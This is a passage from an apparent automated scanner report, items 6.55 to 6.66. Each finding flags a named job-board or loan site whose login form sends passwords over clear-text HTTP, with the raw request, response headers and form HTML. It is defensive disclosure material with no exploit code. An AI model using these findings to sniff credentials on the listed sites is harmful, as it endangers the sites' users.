Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:48 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117229

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.governmentcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.55. http://www.graduateschoolloans.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.graduateschoolloans.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.graduateschoolloans.com/index.php

The form contains the following password field:

clsregistration_password

Request

GET / HTTP/1.1
Host: www.graduateschoolloans.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:56 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=pv00mgmh60i7tksicjfc8juuq5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92867

<script type="text/javascript" src="http://www.graduateschoolloans.com/script/overlibmws.js"></script>
<script type="text/javascript" src="http://www.graduateschoolloans.com/script/overlibmws_scroll.j
...[SNIP]...
<table cellspacing="0" cellpadding="1" border="0">
<form action="/index.php" name="formaccountlogin" method="post">
<input type="hidden" name="clslsluserlogin_hdnsubmited" value="1">
...[SNIP]...
<td><input type="password" name="clsregistration_password" class="inputbox" value="Password" onclick="emptytxtboxpassword();"></td>
...[SNIP]...

6.56. http://www.healthcarecrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.healthcarecrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.healthcarecrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.healthcarecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:59 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=pv7nj7m5sv3h8sbbsgp6rc6ju4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:59 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 140242

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.healthcarecrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.57. http://www.helpdeskcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.helpdeskcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.helpdeskcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.helpdeskcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:06 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=20p261b30i1nrgola0d06ago67; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:06 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 108384

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.helpdeskcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.58. http://www.hospitalitycrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hospitalitycrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.hospitalitycrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.hospitalitycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:08 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=q8m0d2m0af2bg06uti2kh5prd0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:08 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 129154

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.hospitalitycrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.59. http://www.hrcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hrcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.hrcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.hrcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:17 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=p4a701ljjtkci3m6f866chs876; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:18 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116534

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.hrcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.60. http://www.hvaccrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hvaccrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.hvaccrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.hvaccrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:32 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=pber3q1f9cj4n51gq3upv43jp0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:32 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 112628

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.hvaccrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.61. http://www.informationtechnologycrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.informationtechnologycrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.informationtechnologycrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.informationtechnologycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:43 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=k1m7ouon0b4rcae41h2bgg8ig6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:43 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 133954

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.informationtechnologycrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.62. http://www.insurcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.insurcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.insurcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.insurcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:46 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ecpq66kc364asgd97g8ralsb30; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:46 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 127189

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.insurcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.63. http://www.intellectualpropertycrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.intellectualpropertycrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.intellectualpropertycrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.intellectualpropertycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:46 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ajhbe62huej7qoq1voq8lsteu4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 118144

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.intellectualpropertycrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.64. http://www.internshipcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.internshipcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.internshipcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.internshipcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:49 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ol3jscv0r1flgbhg63mnc21c14; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:49 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 132111

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.internshipcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.65. http://www.j2eecrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.j2eecrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.j2eecrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.j2eecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:53 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ov4jbk2b77peoidd95qi1upha7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:54 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111694

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.j2eecrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.66. http://www.journalismcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.journalismcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.journalismcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.journalismcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:25:09 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=bai2pstv5ao7rak55ou3up3b17; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:25:09 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111259

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.journalismcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
